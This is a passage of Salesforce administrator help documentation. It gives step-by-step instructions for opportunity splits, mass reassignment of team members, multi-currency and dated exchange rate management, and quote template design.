1. From Setup, click Customize > Opportunities > Opportunity Teams > Opportunity Splits.
2. Select Enable Opportunity Splits.

Tip:  To better reflect your business process, you can disable either revenue or overlay splits, or enter unique labels
for them. To customize these items at any time, return to the Opportunity Splits setup page, and click Edit.

3. Click Save.
4. Select the page layouts that will display the Opportunity Splits related list.
5. To ensure that users with customized page layouts see the related list, select Append to users’ personal related

list customization.
6. Click Save.

See Also:
Enabling Team Selling
Creating Opportunity Splits
Changing Ownership
Replacing a Team Member on Multiple Records
Removing a Team Member from Multiple Records

Disabling Opportunity Splits
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To disable opportunity splits:

If you disable Opportunity Splits, here’s what happens.

• Splits on all opportunities in your organization are deleted.
• Split reports are deleted.
• Custom reports built using split report templates will still appear in the Reports tab, but you won’t be able to access them.
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Warning:  Disabling Opportunity Splits is irreversible; you won’t be able to retrieve lost splits data.

1. From Setup, click Customize > Opportunities > Opportunity Teams > Opportunity Splits.
2. Deselect Enable Opportunity Splits and click Save.

See Also:
Disabling Team Selling

Reassigning Team Members on Multiple Records
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Use Team Reassignment Wizards”To mass transfer team members:

If your organization uses account teams or opportunity teams, you can make changes to a team member on multiple records
at a time. Using Salesforce, you can add, remove, or replace a team member on any record that contains that team member.

• Adding a Team Member to Multiple Records

• Removing a Team Member from Multiple Records

• Replacing a Team Member on Multiple Records

See Also:
Customizing Opportunity Teams

Adding a Team Member to Multiple Records
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Use Team Reassignment Wizards”To mass transfer team members:

1. From Setup, click Data Management > Mass Reassign Account Teams or Data Management > Mass Reassign
Opportunity Teams.
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If you don't see the Data Management link in Setup, click Mass Reassign Account Teams in the Tools section at the
bottom of the Accounts page, or click Mass Reassign Opportunity Teams from the Tools section at the bottom of the
Opportunities page.

2. Select the Add option and click Next.
3. Enter your criteria to find the records you want to change.
4. Click Next.
5. Check the boxes next to the records you want to change.
6. Click Next.
7. Choose a team member to add to the selected records and select a role for the new team member.

• For account teams, select the appropriate account, contact, case, and opportunity access.
• For opportunity teams, select the appropriate opportunity access and complete any custom fields that are displayed.

Custom fields appear only if they have been defined and added to the opportunity team page layout.

8. Click Add.
9. Click Done after reviewing the number of records changed.

See Also:
Customizing Opportunity Teams

Removing a Team Member from Multiple Records
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Use Team Reassignment Wizards”To mass transfer team members:

1. From Setup, click Data Management > Mass Reassign Account Teams or Mass Reassign Opportunity Teams.

If you don’t see the Data Management link on the Setup page, click Mass Reassign Account Teams from the Tools
section at the bottom of the Accounts page, or click Mass Reassign Opportunity Teams from the Tools section at the
bottom of the Opportunities page.

2. Select Remove and click Next.
3. Enter your criteria to find the records you want to change.
4. Click Next.
5. Select the checkboxes next to the records you want to change.
6. Click Next.
7. Select the existing team member you want to remove.

Note:  If Opportunity Splits is enabled, revenue split percentages for removed team members transfer to the
opportunity owner. You can’t remove the opportunity owner.

1548

Removing a Team Member from Multiple RecordsCustomizing Sales Teams



8. Select a role. The team member is removed only if he or she has this role. Or, select Any Role to remove the team member
regardless of role.

9. Select reassignment options to assign any activities, opportunities, cases, or contacts to the owner.
10. Click Remove.

See Also:
Customizing Opportunity Teams

Replacing a Team Member on Multiple Records
Available in: Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Use Team Reassignment Wizards”To mass transfer team members:

1. From Setup, click Data Management > Mass Reassign Account Teams or Mass Reassign Opportunity Teams.

If you don’t see the Data Management link on the Setup page, click Mass Reassign Account Teams from the Tools
section at the bottom of the Accounts page, or click Mass Reassign Opportunity Teams from the Tools section at the
bottom of the Opportunities page.

2. Select Replace and click Next.
3. Enter your criteria to find the records you want to change.
4. Click Next.
5. Select the checkboxes next to the records you want to change.
6. Click Next.
7. Select the current team member, and then select the replacement team member. To simply change the role of a team

member, select them as the replacement.

Note:  If Opportunity Splits is enabled, the replacement team member inherits the former member’s splits. You
can’t replace the opportunity owner.

8. Select the team member’s role. Select Use Role of Replaced Team Member if the new member will keep that role.

For account teams, select the appropriate account, contact, case, and opportunity access. For opportunity teams, select the
appropriate opportunity access and complete any custom fields that are displayed. Custom fields appear only if they have
been defined and added to the opportunity team page layout.

9. Select reassignment options for the new member as appropriate.
10. Click Replace.

See Also:
Customizing Opportunity Teams
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MANAGING CURRENCIES

Managing Multiple Currencies
Available in: Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“View Setup and Configuration”To view currencies:

“Customize Application”To change currencies:

Your organization can set up the ability to use multiple currencies in opportunities, forecasts, quotes, reports, and other data.

1. Enable multiple currencies for your organization.
2. To designate your corporate currency, from Setup, click Company Profile > Manage Currencies, then click Change

Corporate.
3. To activate additional currencies for your organization, click New in the Active Currencies related list.
4. To use dated exchange rates, enable advanced currency management.
5. Set conversion rates for new currencies. See Editing Conversion Rates. If you have enabled advanced currency management,

see Editing Dated Exchange Rates on page 1557.

Using Multiple Currencies

International organizations can use multiple currencies in opportunities, forecasts, reports, quotes, and other currency fields.
The administrator sets the “corporate currency,” which reflects the currency of the corporate headquarters. The administrator
also maintains the list of active currencies and their conversion rates relative to the corporate currency. The active currencies
represent the countries in which the organization does business. Only active currencies can be used in currency amount fields.

Every user also has a personal currency, which is used as the default currency in his or her own quotas, forecasts (depending
on which forecasting version you use), opportunities, quotes, and reports. Users can also create opportunities and enter amounts
using other active currencies.

Every lead, account, contact, opportunity, and case has a field that specifies the currency to use for all amount fields in that
record. For example, you can set the Account Currency to “USD-U.S. Dollars” so that the Annual Revenue shows in
dollars for one of your American accounts. All currency amounts are displayed in the default currency of the record.
Administrators can choose whether to also display, in parentheses, the user’s personal currency if it is different from the currency
of the record. When you change the default currency of a record, currency amounts are not converted; they simply display
with the new currency code.

Note:  If your organization uses advanced currency management, the opportunity close date determines which
conversion rate to use when displaying currency amounts.

Depending on the forecasting version you have, forecasts currency amounts are automatically converted to the user’s personal
currency; additionally, for managers, their team’s opportunities, forecasts, quotes, and other data is converted and rolled up to
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the manager’s personal currency. The manager can also drill down to see the data in its native currency. All conversion and
roll-ups happen automatically.

Amounts in reports are shown in their original currencies, but can be displayed in any active currency. You can change the
currency used for report totals by selecting a currency from Show > Currencies. The default value for the drop-down is your
personal currency. For any amount, you can also choose to display the Converted column—for example, Annual Revenue
Converted—which will show amounts in the currency you select.

Custom formula fields are not tied to any particular currency. If the result of a formula field is a currency amount, it displays
in the currency of the associated record. This is also true for cross-object formulas that reference merge fields with different
currencies, and formulas in workflow rules and approval processes. However, note that workflow rules and approval processes
that use filters instead of formulas convert all currency values to the corporate currency.

You cannot disable multiple currencies for your organization if the currency fields are referenced in Apex. For example, if
Apex code references the Account Currency field (represented as CurrencyIsoCode in the code), multiple currencies
cannot be disabled.

See Also:
Administrator setup guide: Using Multiple Currencies
Enabling Multiple Currencies

Enabling Multiple Currencies

Available in: Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

To enable multiple currencies in your organization:

1. Familiarize yourself with the implications of enabling multiple currencies.
2. Contact salesforce.com to request enablement. Be prepared to provide the following information:

• The organization ID (production or sandbox)
• The default currency stamp for current and future records (USD, EUR, GBP, etc.)
• Confirmation that you understand that multiple currencies can’t be disabled once enabled
• Confirmation that you are a system administrator authorized on behalf of your organization to request multi-currency

enablement and that you consent to the lockout of this organization for a certain period of time, depending on your
organization’s data usage volume

Note:  For large organizations, multiple currencies might be enabled over the weekend to avoid performance
issues during the work week.

See Also:
Implications of Enabling Multiple Currencies
Managing Multiple Currencies
About Advanced Currency Management
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Implications of Enabling Multiple Currencies

Available in: Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

Enabling multiple currencies introduces permanent changes in your organization. Before proceeding with enablement, be
aware of these implications to ensure a smooth transition for your organization.

• Once enabled, multiple currencies can’t be disabled for your organization.
• Work with your salesforce.com representative to determine the best time for multi-currency enablement. The enablement

process temporarily locks your organization, preventing any integration processing and user logins. The lockout duration
depends on the data space used by your organization. This table shows the lockout durations and recommended times for
enablement.

Recommended Time for EnablementEstimated Organization Lockout
Duration

Used Data Space (excluding files)

AnytimeLess than 2 minutesLess than 100 MB

After 5 p.m. (local time)Up to 1 hour100 MB to 10 GB

After 5 p.m. on Friday (local time)Several hoursOver 10 GB

• Upon enablement, all existing records are stamped with a default currency code that you provide in your enablement request.
For example, if your organization contains records using USD and EUR, you need to switch them all to the same default
currency prior to enablement. Support for this type of conversion is also available as a salesforce.com paid implementation
service.

• Objects that support multiple currencies include Opportunities, Opportunity Products, Opportunity Product Schedules,
Campaign Opportunities, and reports related to these objects and fields. By default, page layouts for these objects have
multiple-currency compatible fields, which allow you to specify the currency for the record. Typically, these fields are
available only when creating a new record or editing an existing record. The selected currency is used for the primary
amount field.

• After enablement, the primary currency displays as usual and, optionally, a secondary currency amount appears in parentheses.
The primary currency is typically the default corporate currency, unless it’s overridden at the record level. The amount
shown in parentheses is the user’s personal default currency, calculated based on the conversion rate settings defined in
your organization. To control whether the converted currency amount appears, enable or disable parenthetical currency
conversion from the Manage Currencies page.

• In reports, the primary currency reflects either the default corporate currency or the currency selected for the record. The
secondary currency reflects the personal default currency of the user running the report, or the currency specified in the
report criteria.

• Users can specify a personal default currency on their personal information page. It displays as the secondary currency
amount (converted amount) if parenthetical currency conversion is enabled. Changing the personal default currency updates
the converted amount in real time.

• Once a currency is added to an organization’s list of supported currencies, it can’t be deleted from the administrator’s list
of currencies, even when it is deactivated. This is a cosmetic issue that doesn’t impact end users. A deactivated currency is
not visible to end users but remains visible to administrators. Salesforce.com recommends that you keep this in mind during
testing and use only those currencies that you eventually plan to use in your organization.

• After enablement, all currency fields display the ISO code of the currency before the amount. For example, $100 displays
as USD 100.
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• By default, all converted amounts in your organization rely on the current conversion rates defined for your organization.
Conversion rates must be set and updated manually. Changing the exchange rate automatically updates converted amounts
on all records, including on closed opportunities.

You can opt to use dated exchange rates by using advanced currency management to track historical exchange rates. When
enabled, advanced currency management allows maintaining a list of exchange rates by date range, and converted currency
amounts on opportunities display based on the specified Close Date, regardless of the opportunity stage. Changing the
Close Date impacts converted amounts if it changes to a different exchange rate period.

Note:  Dated exchange rates are not used in forecasting, currency fields in other objects, or currency fields in other
types of reports.

See Also:
Administrator setup guide: Using Multiple Currencies
Enabling Multiple Currencies
Managing Multiple Currencies
About Advanced Currency Management

Activating and Deactivating Currencies

Available in: Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“View Setup and Configuration”To view currencies:

“Customize Application”To change currencies:

Organizations that have enabled multiple currencies must specify which currencies are supported.

• Active currencies—These represent countries in which your organization does business. Only active currencies can be
entered in opportunities, forecasts, and other items. Once you activate a currency, you can never permanently delete it.

• Inactive currencies—These are currencies that your organization no longer uses. You may have existing records that use
inactive currencies, but you cannot enter new amounts in inactive currencies.

To activate new currencies:

1. From Setup, click Company Profile > Manage Currencies.
2. Click New in the Active Currencies related list.
3. Select a currency. Currencies are alphabetized using their ISO currency code.
4. Enter the conversion rate relative to your corporate currency.
5. Specify the number of decimal places to show for amounts in this currency.
6. Click Save.

To activate a currency from the list of inactive currencies, click Activate next to the currency.
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To deactivate a currency, click Deactivate next to the currency. Deactivating a currency does not alter amounts in items that
use that currency. However, you can no longer enter new amounts using the inactive currency.

Note:  Deactivating a currency that is set as a user’s personal currency automatically resets the user’s currency to the
corporate currency.

See Also:
Managing Multiple Currencies
Editing Conversion Rates
About Advanced Currency Management
Administrator setup guide: Using Multiple Currencies

About Advanced Currency Management
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To enable advanced currency management:

“View Setup and Configuration”To view currencies:

“Customize Application”To change currencies:

Advanced currency management allows you to manage dated exchange rates within opportunities using Salesforce. Dated
exchange rates allow you to map a conversion rate to a specific date range. For example, the exchange rate on January 1 was
1 USD to 1.39 AUD, but on February 1, it changed to 1 USD to 1.42 AUD. Your opportunities that closed between January
1 and February 1 use the first exchange rate (1 = 1.39), while opportunities that closed after February 1 used the second
exchange rate (1 = 1.42).

Dated exchange rates are defined using a start date and a conversion rate. Each rate is in effect until either the end of time or
the day before the next start date for that currency. The time between on start date and the next start date is called the exchange
rate date range. These ranges can be as small as a day and as large as all of time.

To enable or disable advanced currency management, see Enabling or Disabling Advanced Currency Management on page
1555.

When advanced currency management is first enabled, your existing exchange rates automatically become the first set of dated
exchange rates. These rates will be valid for all time, until you define another set of exchange rates. For more information, see
Editing Dated Exchange Rates on page 1557.

If you disable advanced currency management, all currency conversions will use the static conversion rate. See Editing Conversion
Rates on page 1556.
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Advanced Currency Management Considerations

• Dated exchange rates are used for opportunities, opportunity products, opportunity product schedules, campaign opportunity
fields, and reports related to these objects and fields. Dated exchange rates are not used in forecasting, currency fields in
other objects, or currency fields in other types of reports.

• Organizations with advanced currency management support roll-up summary fields between two advanced currency
management objects. For example, roll-up summary fields are supported from an opportunity line object to its opportunity
object, because both are advanced currency management enabled. However, if you enable advanced currency management,
you can’t create roll-up summary fields that calculate currency on the opportunity object rolling up to the account object,
and you can’t filter on the opportunity currency field on the account object. All existing currency-related roll-up summary
fields on the opportunity object are disabled and their values are no longer calculated. If your organization enables advanced
currency management, you should delete any currency roll-up summary fields using opportunities and accounts or
opportunities and custom objects.

• Campaign opportunity fields use dated exchange rates when calculating the amount in the campaign currency, but are not
used when converting those amounts to the user currency.

• Cross-object formulas always use the static conversion rate for currency conversion.
• If advanced currency management is enabled, you can't bind Visualforce pages that use <apex:inputField> or

<apex:outputField> components to currency fields that support advanced currency management.

See Also:
Managing Multiple Currencies
Activating and Deactivating Currencies
Administrator setup guide: Using Multiple Currencies

Enabling or Disabling Advanced Currency Management

Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions.

User Permissions Needed

“Customize Application”To enable advanced currency management:

To enable advanced currency management:

1. Enable multiple currencies for your organization. For more information, see Managing Multiple Currencies on page 1550.
2. From Setup, click Company Profile > Manage Currencies.
3. Click Enable.
4. When prompted, select Yes, I want to enable Advanced Currency Management and click Enable.

When advanced currency management is first enabled, your existing exchange rates automatically become the first set of dated
exchange rates. These rates will be valid for all time, until you define another set of exchange rates.

To disable advanced currency management:

1. From Setup, click Company Profile > Manage Currencies.
2. Click Disable.
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3. When prompted, select Yes, I want to disable Advanced Currency Management and click Disable.

If you disable advanced currency management, all currency conversions will use the static conversion rate. See Editing Conversion
Rates on page 1556.

When advanced currency management is enabled, Visualforce <apex:inputField> and <apex:outputField> components
cannot display currency fields.

See Also:
About Advanced Currency Management

Editing Conversion Rates
Available in: Group, Professional, Enterprise, Unlimited, Developer, and Database.com Editions

User Permissions Needed

“View Setup and Configuration”To view currencies:

“Customize Application”To change currencies:

You can manage exchange rates between your active and inactive currencies and the corporate currency by editing the conversion
rates. These are static exchange rates that apply to all currency fields used in your organization. In addition to these conversion
rates, your organization may also use dated exchange rates for opportunities and opportunity products.

To edit your organization's static conversion rates:

1. From Setup, click Company Profile > Manage Currencies.
2. If advanced currency management is enabled, click Manage Currencies.
3. Click Edit Rates in the Active Currencies or Inactive Currencies lists.
4. Enter the conversion rate between each currency and your corporate currency.
5. Click Save.

When you change the conversion rates, currency amounts are updated using the new rates. Previous conversion rates are not
stored. All conversions within opportunities, forecasts, and other amounts use the current conversion rate.

If your organization uses advanced currency management, you can also manage dated exchange rates for currency fields on
opportunities and opportunity products.

Note:

• You cannot track revenue gain or loss based on currency fluctuations.
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• Changing conversion rates causes a mass recalculation of roll-up summary fields, which may take up to 30 minutes,
depending on the number of records affected and other factors.

See Also:
Setting Corporate Currency
Managing Multiple Currencies
Activating and Deactivating Currencies
Administrator setup guide: Using Multiple Currencies

Editing Dated Exchange Rates
Available in: Group, Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“View Setup and Configuration”To view currencies:

“Customize Application”To change currencies:

To add new dated exchange rates:

1. From Setup, click Company Profile > Manage Currencies.
2. Click Manage Dated Exchange Rates.
3. Click New Exchange Rates.
4. Enter the date that the exchange rates go into effect.
5. Enter the exchange rates.

Note:  The exchange rates will default to the current exchange rate. If you do not want to set a new exchange rate
for a currency, delete the exchange rate (leave the field blank).

6. Click Save to save the new dated exchange rates.

To view existing dated exchange rates:

1. From Setup, click Company Profile > Manage Currencies.
2. Click Manage Dated Exchange Rates.
3. Select the date range you want to view either by entering the date and clicking Go!, or by selecting Previous Range or

Next Range.

To delete a dated exchange rate for a particular currency:

1. From Setup, click Company Profile > Manage Currencies.
2. Click Manage Dated Exchange Rates.
3. Click the name of the currency you want to edit.
4. Click Del for the date range you want to delete.
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If the date range you want is not displayed, enter it in the Show all rates with start dates between fields and
click Go!.

To edit your dated exchange rates for a particular currency:

1. From Setup, click Company Profile > Manage Currencies.
2. Click Manage Dated Exchange Rates.
3. Click the name of the currency you want to edit.
4. Click Edit for the date range you want to edit. If the date range you want is not displayed, enter it in the Show all

rates with start dates between fields and click Go!.
5. Edit the exchange rate, setting it to the new value for the date range, and click Save.

See Also:
About Advanced Currency Management
Managing Multiple Currencies
Activating and Deactivating Currencies
Administrator setup guide: Using Multiple Currencies

CUSTOMIZING OPTIONS FOR QUOTES

Enabling Quotes
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

“Customize Application”To enable or disable Quotes:

To enable Quotes for your organization:

1. From Setup, click Customize  > Quotes > Settings.
2. Select Enable Quotes.
3. Click Save.
4. Select Opportunity Layout to display the Quotes related list on the standard opportunity page layout.
5. Optionally, select Append to users' personal related list customization to add the Quotes related list

to all opportunity page layouts users have customized.
6. Click Save to finish.

Disabling Quotes

Select Disable Quotes to disable the feature for your organization.

1558

Enabling QuotesCustomizing Options for Quotes

http://na1.salesforce.com/help/doc/en/salesforce_using_multiple_currencies.pdf


Important:  You can't disable quotes if your records have any references to quotes, quote line items, or quote PDFs
from any application customizations, including formula fields, triggers, workflow rules, and approval processes. You
must remove these references before you can disable quotes. You can't disable quotes if you have any quotes synced
with an opportunity. You must first stop syncing all quotes before you can disable the feature.

See Also:
Quote Templates Overview
Quotes Overview

Quote Templates Overview
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

"Customize Application"To create quote templates:

"View Setup and Configuration"To view quote templates:

Watch a Demo: Using Quote Templates (2 minutes)

Use quote templates to design, preview, and activate custom templates for the quotes you send to your customers.

Choose standard and custom fields from Quote and quote-related objects, such as Account and Opportunity, and arrange the
data in groups or tables. You can also add and format rich-text content such as signature blocks and terms and conditions,
display your company logo or other images, and create repeating headers and footers.

Users select quote templates from their quote records, generate quote PDFs, and email them to their customers.

The quote templates feature looks and works a lot like the enhanced page layout editor, so if you're familiar with editing page
layouts, you'll find the template editor just as easy to use.

Important:

• If you used quote templates during the Summer '10 beta release, you'll notice a change in how template logos and
signature blocks work. The first time you create a template in the Winter '11 release, if you add any content to
the header or footer, the logo and signature block you previously used won't be displayed. If the new template's
header and footer have no content, the original logo and signature block will appear.

• If you create a configuration-only sandbox for your organization, templates that contain Text/Image fields
cannot be opened for editing within the sandbox.

See Also:
Enabling Quotes
Quotes Overview
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Creating Quote Templates
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

"Customize Application"To create quote templates:

"View Setup and Configuration"To view quote templates:

1. From Setup, click Customize > Quotes > Templates.
2. Click New and select an existing template, such as Standard Template, on which to base your new template.
3. Give your new template a name.
4. On the template editor, drag the elements you want, and then fill in the details. If you want to add:

• One or more Quote fields or fields from related objects, use a section and add fields to it.
• Text that you can edit and format, such as terms and conditions, use Text/Image Field.
• An image, such as your company logo, use Text/Image Field.
• A table of Quote fields or fields from a different object, such as Quote Line Item, use a list.

5. Click Quick Save to save your changes and continue working on the template.
6. Click Save and Preview to preview your template.
7. Click Save when you're finished.
8. Return to the Quote Templates page and click Activate.

Tip:  If you use Chatter, post an update to spread the word that the template is ready for use.

See Also:
Quote Templates Overview
Viewing and Editing Quote Templates
Previewing Quote Templates
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Customizing Quote PDFs with Quote Templates
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

"Customize Application"To create quote templates:

"View Setup and Configuration"To view quote templates:

Use quote templates to design, preview, and activate custom templates for the quotes you send to your customers.

Navigating the Quote Templates Editor

The template editor has two parts: a palette at the top and a template layout below.

The palette contains the elements you can add to the layout, including list and section, and fields that you can add to
sections.

• Click  beneath the palette to expand or collapse it.
• In the left column, select an object to display its fields on the palette.

• Use Quick Find to easily locate items on the palette.

Working with the Quote Templates Editor

• To add an element to the template, drag it from the palette to the layout. Use a section to add and arrange fields
from the quote object. Use a list to create a table with fields from another object, such as quote line item. The
Text/Image Field lets you enter text or upload an image, such as your company logo.

• Press CTRL+click to select multiple fields and SHIFT+click to select a range.

• To remove an element from the layout, drag it back to the palette, or hover over its title bar and click .
• When you drag a section, select Hide Title if you don't want the section's title to appear on the template or the

PDF.
• For any section, (including a header or footer), you can change the number of columns, adjust field alignment, and

hide or show field labels. Click  and make the changes you want.
• To step backward or forward, click Undo and Redo.

• To change the properties of any component on the layout, double-click its title bar or click .
• To rename the template, click Quote Template Properties.

• To preview your template, click Save and Preview.

• To save your changes and continue editing the template, click Quick Save.

• To save your changes when you're finished editing the template, click Save. Don't navigate away from the template
before clicking Save or you'll lose your changes.

See Also:
Quote Templates Overview
Creating Quote Templates
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Viewing and Editing Quote Templates
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

"Customize Application"To create quote templates:

"View Setup and Configuration"To view quote templates:

1. From Setup, click Customize > Quotes > Templates.
2. Click Edit next to the template you want.
3. If you need to edit the template name, click Quote Template Properties and enter the new name in the Template Name

field. Click OK.

Note:  You can't rename a quote template if you're using Salesforce Professional Edition.

4. You can:

• Add or edit sections (for fields), text, images, and lists as needed.
• Redesign the template header or footer.

• Change, hide, or show the title of a section, list, header, or footer after it's in place by clicking . Edit the title and
select or deselect Hide Title.

• Hide field labels in sections and the header and footer.
• Change the number of columns (one or two) in sections.
• Change field alignment (left or right) in sections.

5. Click Save when you're finished.

Alternately, you can save your changes in a copy of the original template by clicking Save As.

Note:  The Save As option isn't available in Salesforce Professional Edition. To make a copy of a template in
Professional Edition, click New on the Quote Templates page then select the existing template that you want to
duplicate.

See Also:
Adding Fields to Quote Templates
Adding Rich Text to Quote Templates
Using Headers and Footers on Quote Templates
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Adding Fields to Quote Templates
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

"Customize Application"To create quote templates:

"View Setup and Configuration"To view quote templates:

On your quote template, you can display standard and custom fields from the quote object and these related objects: account,
contact, opportunity, organization, and user. Use a Text/Image Field to display a graphic, such as your company logo, or
text that can be formatted, such as a signature block. To add fields to a header or footer, just drag them into place. To add
fields to the body of your template, drag a section component first.

Note:

In some cases, a field may not appear on the quote templates palette or on a PDF created from a template.

• If a user is unable to view or update a field because of field-level security settings, that field won't appear on PDFs
created from a template, even if the template includes that field. Read-only fields will appear on PDFs.

• A field that appears on a quote page layout but does not have a value for a given quote will appear on the quote
templates palette, but won't appear on PDFs created from that quote.

• Quote line item fields that don't contain data won't appear as columns in a list when a PDF is created, even if the
template includes that field. For example, if no quote line items offer a discount, the Discount column won't
appear, even if the list includes the Discount field.

• If a related list is not included on a quote page layout, it won't appear on the template palette or any PDFs for
quotes that use that page layout.

Adding Fields to Headers and Footers

1. If you need to change the number of columns in your header or footer, click  and select the number (one or two)
that you want.

2. Drag the fields you want into the header or footer. Press CTRL+click to select multiple fields and SHIFT+click to
select a range.

3. If you want to add rich text or an image, drag the Text/Image Field .

4. If you need to change field alignment within a column, click  and select left or right alignment.

5. If you want to hide field labels, click  and select the Hide checkbox.
6. Use the Blank Space field to add vertical space anywhere on the template.

Adding Fields to the Template Body

1. Drag a section component from the palette to the template.
2. Enter a title for the section. Select Hide Title if you don't want the title to appear on the template or PDF. Click

OK.
3. Select an object from the palette to display its fields.
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4. Drag the fields you want into the section. Press CTRL+click to select multiple fields and SHIFT+click to select a
range.

5. If you want to add rich text or an image, drag the Text/Image Field.

6. If you need to change field alignment within a column, click  and select left or right alignment.

7. If you want to hide field labels, click  and select the Hide checkbox.
8. Use the Blank Space field to add vertical space anywhere on the template.

See Also:
Customizing Quote PDFs with Quote Templates
Viewing and Editing Quote Templates
Using Headers and Footers on Quote Templates

Adding Lists to Quote Templates
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

"Customize Application"To create quote templates:

"View Setup and Configuration"To view quote templates:

Use lists in your quote template to arrange and display fields from quote line item or any other standard or custom object that
has a lookup relationship to the quote object. A list looks like a table, with field names appearing as columns. You can add
lists to the body of your quote template but not to the header or footer.

Note:

In some cases, a field may not appear on the quote templates palette or on a PDF created from a template.

• If a user is unable to view or update a field because of field-level security settings, that field won't appear on PDFs
created from a template, even if the template includes that field. Read-only fields will appear on PDFs.

• A field that appears on a quote page layout but does not have a value for a given quote will appear on the quote
templates palette, but won't appear on PDFs created from that quote.

• Quote line item fields that don't contain data won't appear as columns in a list when a PDF is created, even if the
template includes that field. For example, if no quote line items offer a discount, the Discount column won't
appear, even if the list includes the Discount field.

• If a related list is not included on a quote page layout, it won't appear on the template palette or any PDFs for
quotes that use that page layout.

1. Drag a list from the palette to the template.
2. Enter a title for the list. Select Hide Title if you don't want the title to appear on the template or PDF.
3. In the Object field, select the object whose fields you want to appear in the list.
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4. Use the Add and Remove arrows to move columns from the Available Fields list to the Selected Fields list. Use the Up
and Down arrows to change the order of the columns. A list can include up to 10 fields.

5. Click OK.

See Also:
Quote Templates Overview
Viewing and Editing Quote Templates

Adding Rich Text to Quote Templates
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

"Customize Application"To create quote templates:

"View Setup and Configuration"To view quote templates:

Use the quote templates text/image field to add text you can format, such as your organization's address or terms and conditions.
You can also insert images, like your company logo. You can use text/image fields in the body of your template, and also in
the header and footer.

Rich Text Restrictions

Text formatting is not available in the Text/Image Field for Unicode languages such as Arabic and Japanese.

The maximum number of characters you can use in the quote templates Text/Image Field is 32,000, which includes
the hidden HTML characters used to format text.

1. Drag a Text/Image Field into place in the header, the footer, or any section in the body.
2. Type or paste your text into the field, then format it however you like.
3. Click OK.

Tip:  Use a text/image field to create a signature block.
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Adding Images to Quote Templates
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

"Customize Application"To create quote templates:

"View Setup and Configuration"To view quote templates:

Use the quote templates text/image field to insert images, like your company logo. You can use text/image fields in the body
of your template, and also in the header and footer.

You can store images for uploading in either your own file system or in Salesforce CRM Content.

If you store images on the Documents tab or the Static Resources page, you'll get a Web address you can use to insert the
image.

Note:  If you need to insert an image from a public Web address outside the Salesforce application (such as your
company's website), contact Salesforce and ask to have the public URL whitelisted for your organization.

Image Size Considerations

If you insert an image that's too large, it will be cropped when users create quote PDFs from the template. To prevent
cropping, click Save and Preview after you insert an image, then resize the image if you need to.

Inserting an Uploaded Image

1. If you want to use an image stored in Salesforce CRM Content, locate the image and download it to your local file
directory.

2. Drag a Text/Image Field into place in the header, the footer, or any section in the body.
3. Select Hide Title if you don't want the title to appear on the template or PDF.
4. Click the image icon, then click Browse... and locate the image in your file directory.
5. Click Open and the image appears in the field. You can resize it by dragging the sizing handles, which show the

image's height and width in pixels.
6. Click OK.
7. Click Save and Preview to see how the image will look in PDFs created from the template.

Inserting an Image from a Salesforce Web Address

1. If you need to, upload the image to the Documents tab or define a static resource.
2. Drag a Text/Image Field into place in the header, the footer, or any section in the body.
3. Select Hide Title if you don't want the title to appear on the template or PDF. Click OK.
4. On the Documents tab or the Static Resources page, open the image's detail page, click View File, and copy its URL.

5. Return to the quote template editor and click  in the title bar of the text/image field.
6. Click the image icon, then click the Web Address tab.
7. Paste the URL into the URL field, then click Insert. The image appears in the field. You can resize it by dragging

the sizing handles, which show the image's height and width in pixels.
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8. Click OK.
9. Click Save and Preview to see how the image will look in PDFs created from the template.

Important:  If the image is removed from the Documents tab or Static Resources page, where it is stored, the
template displays a message that the image is not available. Restore the image, then open the template, delete
the error message image, and repaste the URL.

See Also:
Customizing Quote PDFs with Quote Templates
Viewing and Editing Quote Templates
Using Headers and Footers on Quote Templates

Using Headers and Footers on Quote Templates
Available in: Professional, Enterprise, Unlimited, and Developer Editions

User Permissions Needed

"Customize Application"To create quote templates:

"View Setup and Configuration"To view quote templates:

Use headers and footers to show standard, repeating information on your quote template, such as your company logo, your
company address, the date the quote was created, or the quote number. Headers and footers can span the width of the template
or be divided into two equal columns.

A header or footer is essentially a section: you can add fields to it and show or hide its title. You can't remove a header or
footer or add more sections to it.

Note:

In some cases, a field may not appear on the quote templates palette or on a PDF created from a template.

• If a user is unable to view or update a field because of field-level security settings, that field won't appear on PDFs
created from a template, even if the template includes that field. Read-only fields will appear on PDFs.

• A field that appears on a quote page layout but does not have a value for a given quote will appear on the quote
templates palette, but won't appear on PDFs created from that quote.

• Quote line item fields that don't contain data won't appear as columns in a list when a PDF is created, even if the
template includes that field. For example, if no quote line items offer a discount, the Discount column won't
appear, even if the list includes the Discount field.

• If a related list is not included on a quote page layout, it won't appear on the template palette or any PDFs for
quotes that use that page layout.

1. If you need to change the number of columns in your header or footer, click  and select the number (one or two) that
you want.
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Tip:  To display an image that spans the width of a page, use a one-column header or footer. For terms and
conditions text, use a one-column footer.

2. Select an object and drag the fields you want into the header or footer. Press CTRL+click to select multiple fields and
SHIFT+click to select a range.

If you want to use an image, such as your company logo, or include extended information, such as terms and conditions,
use a Text/Image Field.

3. If you need to change field alignment within a column, click  and select left or right alignment.

4. If you want to hide field labels, click  and select the Hide checkbox.
5. Select Hide Title if you don't want the title to appear on the template or PDF.
6. Click OK.

See Also:
Quote Templates Overview
Customizing Quote PDFs with Quote Templates
